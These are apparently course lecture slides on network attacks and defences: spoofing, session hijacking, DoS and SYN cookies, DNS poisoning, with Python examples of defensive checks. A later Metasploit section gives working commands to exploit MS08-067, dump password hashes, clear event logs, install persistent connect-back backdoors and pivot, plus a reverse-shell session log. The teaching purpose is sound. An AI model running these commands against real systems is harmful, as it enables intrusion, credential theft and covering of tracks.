Network Security - IIS Windows Server

Network Security
CPSC6128 – Lecture 3
Attacks, Vulnerabilities and Exploits
CPSC 6128 - Network Security
1
Network Attack Methodology
• Recon – Information gathering
• Scanning – Enumeration
• Vulnerability Identification
• Exploit
    • Gaining access
    • Elevating given access
    • Application/Web level attacks
    • Denial of Service (DOS)
• Post Exploitation
    • Maintaining Access
    • Removing Forensic Evidence
    • Exfiltration
GENERAL NETWORK ATTACK TECHNIQUES
IP address spoofing (1)
[Diagram: host 145.13.145.67 sends a packet to 212.68.212.7 carrying a spoofed source address: SA: 36.220.9.59, DA: 212.68.212.7]
• Attacker doesn’t want actions traced back
• Simply re-configure IP address in Windows or Unix.
• Or enter spoofed address in an application
    • e.g., decoy packets with Nmap
IP address spoofing (2)
[Diagram: attacker 145.13.145.67 sends SA: 36.220.9.59, DA: 212.68.212.7 to victim 212.68.212.7; the victim’s reply SA: 212.68.212.7, DA: 36.220.9.59 goes to the host at 36.220.9.59, not to the attacker]
• But attacker cannot interact with victim
    • Unless attacker is on path between victim and spoofed address
IP spoofing with TCP?
• Can an attacker make a TCP connection to a server with a spoofed IP address?
• Not easy
    • Sequence numbers are negotiated between sender and receiver to ensure that packets are part of an established connection
    • If the attacker can guess the initial sequence number, it can attempt to inject into the conversation
    • But TCP uses random initial sequence numbers
• Poor implementations of TCP, however, can allow the sequence #’s to be predictable
Defense: Egress/Ingress filtering
[Diagram: Egress filtering – the border router of network 222.22/16 drops (x) an outgoing packet whose source address, 127.32.1.1, is not in 222.22/16. Ingress filtering – the router on the Internet side drops (x) a packet arriving from 222.22/16 whose source address, 127.32.1.1, is not in 222.22/16.]
Ingress Filtering: Upstream ISP (1)
[Diagram: two regional ISPs connect to a tier-1 ISP. The first regional ISP serves 12.12/24 and 34.34/24 and sends the tier-1 ISP a BGP update: 12.12/24, 34.34/24. The second serves 56.56/24 and 78.78/24 and sends a BGP update: 56.56/24, 78.78/24.]
Ingress Filtering: Upstream ISP (2)
[Diagram: from the BGP updates the tier-1 ISP installs a filter on each link: on the link from the first regional ISP (12.12/24, 34.34/24), filter all traffic but 12.12/24 and 34.34/24; on the link from the second (56.56/24, 78.78/24), filter all traffic but 56.56/24 and 78.78/24.]
Ingress Filtering: Upstream ISP (3)
[Diagram: a packet with spoofed source 56.56.1.1 arrives from the first regional ISP; the tier-1 filter “all but 12.12/24 and 34.34/24” on that link drops it (x).]
Ingress Filtering: Upstream ISP (4)
[Diagram: a host in 12.12/24 sends a packet with spoofed source 34.34.1.1 through the first regional ISP; it matches the tier-1 filter “all but 12.12/24 and 34.34/24”, so the spoofed packet gets through!]
Ingress/Egress filtering: Summary
• Effectiveness depends on widespread deployment at access ISPs
• Deployment in upstream ISPs helps, but does not eliminate IP spoofing
• Even if universally deployed at access, a hacker can still spoof another address in its access network 12.12/24
• See RFC 2827 “Network Ingress Filtering: Defeating DDoS”
Attack: TCP Session Hijacking
• A technique used to gain access to Internet servers
• It was first used by Kevin Mitnick to gain access to Tsutomu Shimomura's workstation in 1995
• Take control of one side of a TCP connection
• Marriage of sniffing and spoofing
[Diagram: Alice has a telnet session to Bob; the attacker sits on Alice’s segment]
TCP Session Hijacking: Limitation
[Diagram: 1. Bob replies to Alice with a weird ACK # for data she never sent. 2. To resync, Alice sends a segment with the correct seq #. Bob is getting segments from the attacker and Alice: source IP address the same, but seq #’s different. Bob likely drops the connection.]
Attacker’s solutions:
1) Overwrite IP-to-MAC ARP tables, then Alice’s segments will not reach Bob and vice-versa
2) DOS attack Alice so her machine won’t see erroneous replies from Bob
3) Older method was to use IP source routing to route packets back to attacker
Session hijacking: The details
• Attacker and Alice are on the same network segment
    • where traffic passes from Alice to Bob, as well as to the attacker
• Attacker can sniff the packets
    • and see TCP packets between Bob and Alice and their sequence numbers
• Attacker jumps in, sending TCP packets to Bob
    • source IP address = Alice’s IP address
• Bob now obeys commands sent by attacker, thinking they were sent by Alice
• Principal defense
    • Encryption with authentication protocol
    • Attacker does not have keys to decrypt and insert meaningful traffic
• What if Attacker and Alice are not on the same network segment?
    • Very complex, please read the handout – TCP Session Hijacking
• Tools used
    • Juggernaut (Linux)
    • Hunt (Unix based)
    • T-Sight (Windows OS)
HTTP Session Hijacking
[Diagram: Client and Web Server exchange HTTP Session ID: ADEF78DDC543DDDE; the Attacker observes it]
• Involves obtaining the HTTP Session ID
• The ID can be found in cookies and URLs
• Called Sidejacking if sniffed
Firesheep – HTTP Sidejacking
---Not downloaded, but handout.
Denial-of-Service Attacks
Prevent access by legitimate users or stop critical system processes
• Vulnerability attack
    • Send a few crafted messages to target app that has vulnerability
    • Malicious messages called the “exploit”
    • Remotely stopping or crashing services
• Connection flooding
    • Overwhelming connection queue with SYN flood
• Bandwidth flooding attack
    • Overwhelming communications link with packets
• Strength in flooding attack lies in volume rather than content
DoS and DDoS
• DoS:
    • source of attack is a small # of nodes
    • source IP typically spoofed
• DDoS
    • From thousands of nodes
    • IP addresses often not spoofed
    • Often implemented as a Botnet
Interlude: IP datagram format
[Diagram: IPv4 header, 32 bits per row]
ver | head. len (header length, bytes) | type of service (“type” of data) | length (total datagram length, bytes)
16-bit identifier | flgs | fragment offset   (for fragmentation/reassembly)
time to live (max number remaining hops, decremented at each router) | upper layer (upper layer protocol to deliver payload to) | Internet checksum
32 bit source IP address
32 bit destination IP address
Options (if any)
data (variable length, typically a TCP or UDP segment)
IP Fragmentation and Reassembly
Example
• 4000 byte datagram
• MTU = 1500 bytes
One large datagram becomes several smaller datagrams:
original:   length=4000, ID=x, fragflag=0, offset=0
fragment 1: length=1500, ID=x, fragflag=1, offset=0     (1480 bytes in data field)
fragment 2: length=1500, ID=x, fragflag=1, offset=185   (offset = 1480/8)
fragment 3: length=1040, ID=x, fragflag=0, offset=370
DoS: examples of vulnerability attacks
• Land: sends spoofed packet with source and dest address/port the same
• Ping of death: sends oversized ping packet
• Teardrop, Newtear, Bonk, Syndrop: tools send overlapping segments, that is, fragment offsets incorrect.
• Jolt2: sends a stream of fragments, none of which have fragflag set to 0. Rebuilding consumes all processor capacity.
Patches fix the problem, but malformed packet attacks continue to be discovered.
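The fragmentation example and the malformed-fragment attacks above, worked through in code. This is an added example, not the lecture's: fragment() reproduces the 4000-byte / MTU 1500 computation, and reassemble() shows the checks a receiving stack applies to reject the fragment trains named on the slide; the 20-byte header and the 0x1234 identifier are assumptions.

```python
"""IPv4 fragmentation and defensive reassembly.

Added example, not from the lecture. reassemble() refuses overlapping
offsets (Teardrop-style), totals beyond 65535 bytes (Ping of death-style)
and trains with no final fragment (Jolt2-style) instead of rebuilding them.
"""
from __future__ import annotations

from dataclasses import dataclass

IP_HEADER_LEN = 20       # header without options, bytes (assumption)
MAX_DATAGRAM = 65535     # largest total length the 16-bit length field allows


@dataclass(frozen=True)
class Fragment:
    length: int     # total length field: header + data, bytes
    ident: int      # 16-bit identifier shared by all fragments of one datagram
    fragflag: int   # "more fragments" flag: 1 = more follow, 0 = last fragment
    offset: int     # fragment offset field, in 8-byte units


def fragment(total_length: int, mtu: int, ident: int = 0x1234) -> list[Fragment]:
    """Split a datagram of total_length bytes into fragments that fit the MTU."""
    payload = total_length - IP_HEADER_LEN
    # Non-final fragments carry a multiple of 8 data bytes, because the offset
    # field counts 8-byte units: (1500 - 20) // 8 * 8 = 1480 for the slide.
    chunk = (mtu - IP_HEADER_LEN) // 8 * 8
    frags, sent = [], 0
    while sent < payload:
        size = min(chunk, payload - sent)
        more = 1 if sent + size < payload else 0
        frags.append(Fragment(IP_HEADER_LEN + size, ident, more, sent // 8))
        sent += size
    return frags


def reassemble(frags: list[Fragment]) -> int:
    """Return the reassembled total length, or raise ValueError for a train
    that a hardened IP stack should discard rather than try to rebuild."""
    if not frags:
        raise ValueError("empty fragment train")
    if len({f.ident for f in frags}) != 1:
        raise ValueError("fragments belong to different datagrams")
    expected_start = 0
    last_flag = 1
    for f in sorted(frags, key=lambda f: f.offset):
        start = f.offset * 8
        data_len = f.length - IP_HEADER_LEN
        if data_len <= 0:
            raise ValueError("fragment carries no data")
        if start < expected_start:
            raise ValueError(f"overlap at byte {start} (Teardrop-style)")
        if start > expected_start:
            raise ValueError(f"gap before byte {start}: fragment missing")
        expected_start = start + data_len
        if IP_HEADER_LEN + expected_start > MAX_DATAGRAM:
            raise ValueError("total exceeds 65535 bytes (Ping of death-style)")
        last_flag = f.fragflag
    if last_flag != 0:
        raise ValueError("no final fragment: train never completes (Jolt2-style)")
    return IP_HEADER_LEN + expected_start


def is_malformed(frags: list[Fragment]) -> bool:
    """True when reassemble() would reject the train."""
    try:
        reassemble(frags)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    for f in fragment(4000, 1500):
        print(f)     # lengths 1500, 1500, 1040 with offsets 0, 185, 370
    print("reassembled:", reassemble(fragment(4000, 1500)), "bytes")
```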
Connection flooding: Overwhelming connection queue w/ SYN flood
• Send SYN packet
    • Recall client sends SYN packet with initial seq. number when initiating a connection.
• Allocate Memory
    • TCP on server machine allocates memory on its connection queue, to track the status of the new half-open connection.
• Wait for ACK
    • For each half-open connection, server waits for ACK segment, using a timeout that is often > 1 minute
• Attack
    • Send many SYN packets
    • Fill up connection queue with half-open connections
    • Can spoof source IP address
    • When connection queue is exhausted, no new connections can be initiated by legit users.
DoS: Overwhelming connection queue with SYN flood
[Diagram: Amateur attack – attacker floods the victim with SYNs using Alice’s address; Alice answers the victim’s SYN-ACKs with RST, so the connection queue is freed up with the RST segment.]
Expert attack:
• Use multiple source IP Addresses
• Each from unresponsive addresses
SYN flood defense: SYN cookies (1)
[Diagram: Client sends SYN with ISNA; Web Server answers SYN-ACK with ISNB = cookie]
• When SYN segment arrives, server calculates function (hash) based on:
    • Source and destination IP addresses and port numbers, MSS (Max Segment Size) and a slowly incrementing timestamp
    • Hash output 32 bits
• Server uses resulting “cookie” for its initial seq # (ISN) in SYNACK
• Server does not allocate anything to half-open connection:
    • Does not remember client’s ISN
    • Does not remember cookie
SYN flood defense: SYN cookies (2)
• If SYN is legitimate
    • Client returns final ACK w/ Seq# = ISN(of server)+1
    • Server computes same function, verifies function = SEQ # in ACK segment
    • Legit connection established without the need for half-open connections
• If SYN-flood attack with spoofed IP address
    • No ACK comes back to server for connection.
    • No problem: server is not waiting for an ACK and has no resources allocated
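The two SYN-cookie slides above, worked through in code. This is an added example, not the lecture's code and simpler than a real TCP stack: the server's ISN is a 32-bit value derived from the 4-tuple, the client's MSS and a slowly incrementing minute counter, so nothing is stored per half-open connection; the field widths, the MSS table and the keyed SHA-256 function are assumptions.

```python
"""SYN cookie minting (on SYN) and checking (on the final ACK).

Added example, not from the lecture. Cookie layout (assumed): 5 bits of
minute counter, 2 bits selecting an MSS from MSS_TABLE, 25 bits of keyed
hash over the 4-tuple, counter and MSS index. The server keeps no state
between make_cookie() and check_cookie().
"""
from __future__ import annotations

import hashlib
import hmac
import os
from typing import Optional, Tuple

SECRET = os.urandom(16)               # per-process secret; a real stack rotates it
MSS_TABLE = (536, 1220, 1440, 1460)   # MSS values encodable in 2 bits
COUNTER_BITS, MSS_BITS, MAC_BITS = 5, 2, 25   # 5 + 2 + 25 = 32-bit cookie

Tuple4 = Tuple[str, int, str, int]    # (src_ip, src_port, dst_ip, dst_port)


def _mac(conn: Tuple4, counter: int, mss_idx: int) -> int:
    """Keyed hash over the connection 4-tuple, time counter and MSS index."""
    msg = f"{conn}|{counter}|{mss_idx}".encode()
    digest = hmac.new(SECRET, msg, hashlib.sha256).digest()
    return int.from_bytes(digest[:4], "big") & ((1 << MAC_BITS) - 1)


def make_cookie(conn: Tuple4, client_mss: int, minute: int) -> int:
    """Server ISN for the SYN-ACK. Called when the SYN arrives; stores nothing."""
    mss_idx = max((i for i, m in enumerate(MSS_TABLE) if m <= client_mss), default=0)
    counter = minute & ((1 << COUNTER_BITS) - 1)
    return ((counter << (MSS_BITS + MAC_BITS))
            | (mss_idx << MAC_BITS)
            | _mac(conn, counter, mss_idx))


def check_cookie(conn: Tuple4, ack_number: int, minute: int,
                 max_age: int = 1) -> Optional[int]:
    """Validate the handshake's final ACK. Returns the MSS to use for the
    connection, or None if the ACK does not carry a cookie this server minted
    for this 4-tuple within the last max_age minutes."""
    cookie = (ack_number - 1) & 0xFFFFFFFF      # client acknowledges ISN + 1
    counter = cookie >> (MSS_BITS + MAC_BITS)
    mss_idx = (cookie >> MAC_BITS) & ((1 << MSS_BITS) - 1)
    mac = cookie & ((1 << MAC_BITS) - 1)
    age = (minute - counter) & ((1 << COUNTER_BITS) - 1)
    if age > max_age:
        return None                             # stale or replayed cookie
    expected = _mac(conn, counter, mss_idx)
    if not hmac.compare_digest(mac.to_bytes(4, "big"), expected.to_bytes(4, "big")):
        return None                             # forged or mangled ACK number
    return MSS_TABLE[mss_idx]


if __name__ == "__main__":
    conn = ("36.220.9.59", 40000, "212.68.212.7", 80)   # constructed client/server pair
    isn = make_cookie(conn, 1460, minute=100)
    # Legitimate client: ACK = ISN + 1 arrives shortly afterwards.
    print("legit ACK  ->", check_cookie(conn, isn + 1, minute=100))
    # Spoofed SYN flood: no ACK ever returns and no state was allocated, so
    # there is nothing to time out. A forged or late ACK is simply rejected:
    print("forged ACK ->", check_cookie(conn, (isn ^ 1) + 1, minute=100))
    print("late ACK   ->", check_cookie(conn, isn + 1, minute=104))
```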
Another Attack: Overwhelming link bandwidth with packets
• Attack traffic can be made similar to legitimate traffic, hindering detection.
• Flow of traffic must consume target’s bandwidth resources
    • Attacker needs to engage more than one machine => DDoS
• May be easier to get target to fill up its upstream bandwidth: async access
Example: Distributed DoS
Attacker takes over many machines, called “bots”. Potential bots are machines with vulnerabilities.
[Diagram: the attacker controls several bots across the Internet; bot processes wait for command from attacker to flood a target, the victim]
Example: LOIC (try it)
DDoS using DNS Server – Amplification Attack
[Diagram: the attacker sends requests with Source IP = Victim’s IP to several DNS servers; each DNS server sends its reply to the victim]
DDoS: Amplification Attack
• Spoof source IP address = victim’s IP
• Goal:
    • generate lengthy or numerous replies for short requests: Amplification
• Amplification Attack
    • can also be done with Web and other services
DDoS Defenses
• Don’t let your systems become bots
    • Keep systems patched up
    • Employ egress anti-spoof filtering on external router
• Filter dangerous packets
    • Signature and anomaly detection and filtering
• Rate limiting
    • Limit # of packets sent from source to dest
• To avoid vulnerability attacks
    • Use Intrusion prevention systems
• Over-provisioning of resources
    • Abundant bandwidth
    • Large pool of servers
    • ISP needs abundant bandwidth too
    • Multiple ISPs
DNS attacks
• Reflector attack
    • Leverage DNS for attacks on arbitrary targets - DDOS
• Denying DNS service
    • Stop DNS root servers
    • Stop top-level-domain servers (e.g. .com domain)
    • Stop local (default) name servers
• Use fake DNS replies to redirect user
• Poisoning DNS
    • Insert false resource records into various DNS caches
    • False records contain IP addresses operated by attackers
DDOS DNS Attack Against Root Servers
Example
• Oct 21, 2002
    • Ping packets sent from bots to the 13 DNS root servers
    • Goal: bandwidth flood servers
• Minimize impact:
    • DNS caching
    • Rate limiting at upstream routers: filter pings when they arrive at an excessive rate
• Root server attack is easy to defend
    • Download root server database to local (default) name servers
    • Not much data in root server; changes infrequently
• Similar kind of attack attempted in March 2012
DNS attack: redirecting
[Diagram: client, attacker and local DNS server share a hub or WiFi network. 1. Client sends DNS query to its local DNS server; sniffed by attacker. 2. Attacker responds with bogus DNS reply.]
Issues:
• Must spoof IP address
    • Set to local DNS server (easy)
• Must match reply ID with request ID
    • Easy
• May need to stop reply from the local DNS server
    • harder
Poisoning DNS Cache
• Poisoning
    • Attempt to put bogus records into DNS name server caches
    • Bogus records could point to attacker nodes
    • Attacker nodes could phish
• But unsolicited replies are not accepted at a name server
    • Name servers use IDs in DNS messages to match replies to queries
    • So can’t just insert a record into a name server by sending a DNS reply message.
• But can send a reply to a request.
Poisoning local DNS server
[Diagram: a client connecting remotely to CSU uses its local ISP DNS server; the attacker is at 17.32.8.9; csu = ColumbusState. 1. DNS query www.csu.edu=? 2. The local ISP DNS server makes iterative DNS queries toward the authoritative DNS for csu.edu. 3. DNS reply www.csu.edu=17.32.8.9]
Goal: Put bogus IP address for poly.edu in local Berkeley DNS server
1) Attacker queries local DNS server
2) Local DNS makes iterative queries
3) Attacker waits for some time; sends a bogus reply, spoofing authoritative server for csu.edu.
Poisoning local DNS server (cont)
[Diagram: 1. Client sends DNS query www.csu.edu=? to its local ISP DNS server. 2. DNS response www.csu.edu=17.32.8.9, the poisoned record. 3. Client opens an http connection to 17.32.8.9, the attacker’s machine.]
DNS response can provide IP address of malicious server!
DNS Poisoning (cont)
• Issues:
    • Attacker needs to know sequence number in request message sent to upstream server
        • Not easy!
    • Attacker may need to stop upstream name server from responding
        • So that server under attack doesn’t get suspicious
        • Ping of death, DoS, overflows, etc
DNS attacks: Summary
• DNS
    • a critical component of the Internet infrastructure
    • But is surprisingly robust
        • DDoS attacks against root servers have been largely unsuccessful
        • Poisoning and redirecting attacks are difficult unless you can sniff DNS requests
        • And even so, may need to stop DNS servers from replying
• DNS can be leveraged for reflection attacks against non-DNS nodes
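The reply-matching rule behind the poisoning slides ("unsolicited replies are not accepted", "attacker needs to know the ID in the request"), worked through in code. This is an added example, not the lecture's: a minimal resolver records each outstanding query under a random 16-bit ID and accepts a reply only if its ID, question and source server match a pending query; the message fields and the sample server addresses are constructed for illustration.

```python
"""Reply acceptance at a caching name server.

Added example, not from the lecture. A reply with a guessed ID, a wrong
source server, or one arriving after the query was already answered is
dropped and logged; only the matching reply reaches the cache. This is
exactly why the slides' attacker must learn the ID, by sniffing or guessing.
"""
from __future__ import annotations

import secrets
from dataclasses import dataclass
from typing import Dict, List, Optional


@dataclass(frozen=True)
class DnsReply:
    txid: int          # 16-bit transaction ID copied from the query
    qname: str         # question name the reply claims to answer
    src_ip: str        # address the reply arrived from
    src_port: int
    answer_ip: str     # A record carried in the answer section


@dataclass(frozen=True)
class PendingQuery:
    qname: str
    server_ip: str
    server_port: int


class Resolver:
    def __init__(self) -> None:
        self.pending: Dict[int, PendingQuery] = {}
        self.cache: Dict[str, str] = {}
        self.rejected: List[str] = []

    def send_query(self, qname: str, server_ip: str, server_port: int = 53) -> int:
        """Record an outstanding query under a fresh random ID."""
        txid = secrets.randbelow(1 << 16)
        while txid in self.pending:
            txid = secrets.randbelow(1 << 16)
        self.pending[txid] = PendingQuery(qname, server_ip, server_port)
        return txid

    def receive(self, reply: DnsReply) -> bool:
        """Cache the reply only if it matches a pending query on every field."""
        pending = self.pending.get(reply.txid)
        if pending is None:
            self.rejected.append(f"unsolicited reply id=0x{reply.txid:04x} from {reply.src_ip}")
            return False
        if (reply.qname, reply.src_ip, reply.src_port) != (
            pending.qname, pending.server_ip, pending.server_port
        ):
            self.rejected.append(f"reply id=0x{reply.txid:04x} does not match its query")
            return False
        del self.pending[reply.txid]     # one reply per query; later ones are unsolicited
        self.cache[reply.qname] = reply.answer_ip
        return True

    def lookup(self, qname: str) -> Optional[str]:
        return self.cache.get(qname)


if __name__ == "__main__":
    r = Resolver()
    txid = r.send_query("www.csu.edu", "198.51.100.53")   # constructed upstream server
    # A bare reply with a wrong ID does not get in: "can't just insert a record".
    guess = (txid + 1) & 0xFFFF
    print(r.receive(DnsReply(guess, "www.csu.edu", "198.51.100.53", 53, "17.32.8.9")))
    # The genuine reply, carrying the matching ID and source, is cached.
    print(r.receive(DnsReply(txid, "www.csu.edu", "198.51.100.53", 53, "192.0.2.10")))
    print(r.lookup("www.csu.edu"), r.rejected)
```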
TOOLS AND ATTACK IMPLEMENTATION
Vulnerability Scanners
• Vulnerability
    • a software bug or mis-configuration allowing for unauthorized access
• Original vulnerability scanner
    • It was called SATAN (Security Admin Tool for Analyzing Networks)
    • Written by Dan Farmer in 1995, employed by SGI at the time
    • Very controversial when released
    • It eventually resulted in SGI firing Dan Farmer
• Commercial scanners (currently)
    • ISS Internet Scanner
    • SAINT
    • Retina by eEye
    • Nessus by Tenable
Nessus
• Nessus project started by Renaud Deraison in 1998
• Very popular vulnerability scanner
• Oct 2005 founded Tenable security and changed to “closed source”
    • Still free but with limited signature set
• OPEN-VAS is a fork of the original Nessus code
    • and is still open source at http://www.openvas.org
Nessus Architecture [screenshot]
Nessus Plugin Selection [screenshot]
Nessus Scan Results [screenshot]
Web Vulnerability Scanners
• Nikto
    • Most popular
    • Looks for default files and configs as well as server misconfiguration
    • Provides versioning information
    • Runs on Linux or Windows
    • http://www.cirt.net
Nikto [screenshot]
Exploits Bought and Sold [screenshot]
Exploitation Tools
• Immunity Canvas
    • Commercial
    • http://www.immunitysec.com
• Core Impact
    • Commercial
    • http://www.coresecurity.com
• Metasploit
    • Open Source: http://www.metasploit.org
    • recently acquired by Rapid7
Immunity Canvas
• Runs on Windows, OS X or Linux (Linux recommended)
• Currently over 370 exploits with an average of 4 exploits added each month
• Flexible payload options
    • Connect to sock or “call back”
• MOSDEF session allows for arbitrary code execution
    • Can get screenshots, video, keylogging, etc.
Canvas Interface [screenshot]
Canvas Interface
Red – Modules – Things that Canvas can do
Purple – Things that Canvas knows about
Yellow – Status Window, what Canvas is currently doing
Canvas – Set Target [screenshot]
Canvas – Port Scan
• Canvas has reconnaissance tools and vulnerability assessment tools built in
• These can be supplemented by imports from other tools such as Nessus
• Here we can see that the scan reveals the usual Windows ports open
Canvas – Exploits
Let’s try an SMB exploit
Canvas – Launch Exploit [screenshot]
Canvas – Success, We Have Shell! [screenshot]
The Metasploit Framework
• Open Source Development Framework for
    • Penetration testing
    • Patch verification
    • Regression testing
    • Security Research
• Runs on Linux, Mac OS X, BSD, Windows
• Remote and local exploits
• Browser exploits
• Ability to create exploits
• Developed by HD Moore
• Recently “acquired” by Rapid7
    • All indications are that it will remain open source
Terms
• Vulnerability
    • weakness in a system which allows an attacker to reduce the system’s security posture
• Exploit
    • Code which allows an attacker to take advantage of the vulnerability in the system
• Payload
    • The code which is delivered by the exploit
    • This is the code which actually runs on the victim system
    • Post exploitation
• Encoders
    • Way to obfuscate the payload code so that anti-virus and IDS won’t detect it
• Module
    • A small piece of code that can be added to the Metasploit Framework to execute an attack
• Auxiliary Module
    • other parts of Metasploit that aid in exploitation such as scanners
Why Metasploit Framework?
• Individual exploit code hard to manage, update and customize
    • No code reuse
• With a framework there is no need to customize exploits to match payload code
    • Mix and match exploits and payloads easily
• Rapid development of new exploit code
Architecture Overview
[Diagram by HD Moore/MSF: Libraries – REX, Framework:Core, Framework:Base; Interfaces – msfweb, msfcli, msfconsole, msfgui, msfapi; Modules – exploits, payloads, encoders, nops, auxiliary; alongside Custom Plugins, Protocol Tools, Security Tools, Web Interfaces, Services and Integration]
Different types of Payload
• Inline
    • A single payload containing the exploit and full shellcode for the selected task
    • Inline payloads are by design more stable than their counterparts because they contain everything all in one
    • However, some exploits won’t support the resulting size of these payloads
• Staged
    • Many exploitable situations constrain how many bytes an attacker may load into one contiguous location in memory
    • One way to do interesting post exploitation in these situations is to deliver the payload in stages
• Reverse
    • Instead of the attacker connecting to the payload on the exploited host, the payload on the exploited host connects back to the attacker
    • Good for inside firewalls.
• NoNX
    • The NX (No eXecute) bit is a feature built into some CPUs to prevent code from executing in certain areas of memory.
    • In Windows, NX is implemented as Data Execution Prevention (DEP)
    • The Metasploit NoNX payloads are designed to circumvent DEP
• PassiveX
    • A payload that can help in circumventing restrictive outbound firewalls
    • It does this by using an ActiveX control to create a hidden instance of Internet Explorer
    • Using the new ActiveX control, it communicates with the attacker via HTTP requests and responses
More About Payloads (cont)
• IPv6
    • IPv6 payload designed to work over IPv6
• Meterpreter
    • Short for Meta-Interpreter
    • an advanced, multi-faceted payload that operates via DLL injection
    • resides completely in the memory of the remote host
    • leaves no traces on the hard drive
    • making it very difficult to detect with conventional forensic techniques
Meterpreter
• Meta-Interpreter
• Advanced payload which operates via DLL injection
• Resides completely in memory
• No hard disk writes at all
• Scripts and plugins supported
• Well supported and constant development
• Encrypted communications between the attacker and payload
• Remote command execution
• In-memory process migration
• Registry modifications
• Pivoting
• File system support and more
How it Works
1. Exploit + 1st Stage Payload
2. Payload Connects back to MSF
3. 2nd Stage DLL Injection Payload Sent
4. MSF Sends Meterpreter Server DLL
5. Client and Server Communicate
Metasploit Interfaces
• MSFGUI
• MSFd
• MSFWeb
• MSFConsole
• MSFCLI
• Armitage
MsfConsole [screenshot]
MsfConsole Basics
• Interactive console for Metasploit
• Tab completion (double tap) to help type
• Can execute external commands
• Most flexible interface
Directory Structure
• Modules
    • What we will mainly be working with
    • Contain Exploits, auxiliary, encoders
• Scripts
    • extension scripts
    • Typically from 3rd parties.
    • “run checkvm”, “run getcountermeasure”, “run getgui” (Meterpreter scripts)
• Plugins
    • location for your own exploits development
• External
    • interfaces to external services such as a serial port
• Data
    • data source for exploits
    • dictionaries, wordlists, sql, snmp mibs, etc.
Modules
• Auxiliary
    • tasks outside of direct exploitation such as port scanning, sniffing, etc
• Encoders
    • various techniques for obfuscating payloads to avoid antivirus and IDS
• Exploits
    • organized by OS
    • Ruby scripts containing the exploit code
• Nops
    • nop sleds for various CPU architectures
• Post
    • post exploitation scripts for data gathering, exfiltration
• Payloads
    • 3 types (singles, stagers, stages)
    • OS specific
Exploitation Basics – search exploits
• Identify vulnerability
    • based on recon and possible output from vulnerability scanner (Nessus)
• Choose exploit
    • which can take advantage of that vulnerability
• Use “search”
    • example using MS08-067
• Play techno music in background
Exploitation Basics – use exploits
• “use” command followed by directory path
    • “use exploit/windows/smb/ms08_067_netapi”
• Use tab completion
    • double tap
• Display options required for exploit: “show options”
Exploitation Basics – Set PAYLOAD
• Select PAYLOAD
    • to deliver after successful exploitation
    • Can use tab completion to show options
    • “set PAYLOAD windows/meterpreter/bind_tcp”
• bind_tcp will listen for attacker to connect
• Reverse payload will connect back to the attacker
Exploitation Basics – Set RHOST
• “show options” now shows PAYLOAD options
• “set” command will set the options
    • “set RHOST 172.16.156.132”
Exploitation Basics – Finally, exploit
• “exploit” to run exploit
• Will open a session to target with prompt “meterpreter>”
• “background” will send session to the background
• “sessions -i 1” will return to the first session
• “execute -f cmd.exe -i -H” will give a remote shell
Now What? - Post Exploitation
• Meterpreter Basics
    • Migrate
        • migrates the meterpreter DLL injection to a different process
        • Explorer.exe is a good choice
    • Sysinfo
        • displays information about the target system
    • Download
        • “download c:\\boot.ini” - downloads from the target machine
        • Note double slashes
    • Upload
        • “upload c:\\boot.ini c:\\windows\system32”, or “upload c:\\boot.ini yang”
        • uploads file to the target machine
    • Getuid
        • returns the userid (permissions) that meterpreter is running as
    • Execute
        • “execute -f cmd.exe -i -H” runs command on the remote machine
        • “-i” runs the command interactively
        • “-H” hides the process from user
    • hashdump
        • dumps the SAM database for offline cracking
    • Clearev
        • clears the windows events logs
    • MUCH MORE
        • See: http://www.offensive-security.com/metasploit-unleashed/
Pivoting
• Using one compromised machine to further exploit other hosts or networks
• Example would be a client side “drive by browser” attack
• Once the attacker owns this machine inside the firewall
    • they can launch all further attacks from this compromised machine
[Diagram: Attacker → Compromised Machine → Target Machine]
Add Route to an existing session
• Add route from attacker machine to remote network
    • “route add 10.100.100.0 255.255.255.0 1”
    • adds a route to the remote network through meterpreter session 1
    • Further attacks to 10.100.100.0 will traverse this session and the already exploited host
Persistence
• If remote target reboots
    • meterpreter session is lost
• Might be ok if exploit is reliable
    • Just run again
• However, this is usually not the case
• Two ways to perform persistence with Meterpreter
    • Persistence script
    • Metsvc
        • Set up a backdoor at the remote machine: use “run metsvc -A”
        • Remove backdoor: use “run metsvc -r”
Persistence Script
• Creates persistent backdoor
    • which can be configured to connect back to attacker on system boot
• Creates a vbs file and registry key
• Can be uninstalled remotely
• “run persistence -A -L c:\\windows\system32 -X -i 10 -p 443 -r 192.168.1.10”
Metsvc backdoor
• Backdoor runs as a service on the target
• Attacker can connect to it remotely
• Less noisy compared to persistence script
“3rd Party” Rootkits
• Used for more advanced post exploitation
• Hiding process, files, data exfil.
• http://www.rootkit.com
• HackerDefender
    • written by Holy Father
    • Kernel mode rootkit
    • Holy Father offered custom builds of HD to bypass AV/IDS
    • Well understood – so we may use this in lab
Client Side Exploits
• Network side exploits are becoming more and more rare
• Attackers have moved to “client side” exploits
• Client-side exploits leverage software/applications running on the target system
• Browser based attacks are common
• Java also a significant attack vector
Example Client Side Exploit [screenshot]
Example Client Side Exploit
msf> exploit(apple_itunes_playlist) > exploit
[*] Started reverse handler
[*] Using URL: http://10.10.11.10:8080/mycoolplaylist.pls
[*] Server started.
[*] Exploit running as background job.
msf> exploit(apple_itunes_playlist) >
[*] Sending stage (474 bytes)
[*] Command shell session 1 opened (10.10.21.10:65535 ->
192.168.113.10:1075)
msf> exploit(apple_itunes_playlist) > sessions -i 1
[*] Starting interaction with 1...
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\System32\>
Armitage
• Type “armitage” from Backtrack
• Defaults ok
• Will start Metasploit and auto connect. Click YES when prompted to start Metasploit
Scanning
• Nmap built in
• MSF scans are Metasploit built-in scanning modules. Generally Nmap is better
• All found targets are automatically added to the target window
Exploitation
• Apply “Find Attack” either by Port or by Vulnerability first
• Right click target will bring up possible exploits
• Can also specify exploits and modules from the right hand menu
Exploitation
• When host is compromised it appears RED with Lightning
• Select “Interact”, then Command Shell access
Next Time
• Covering your tracks….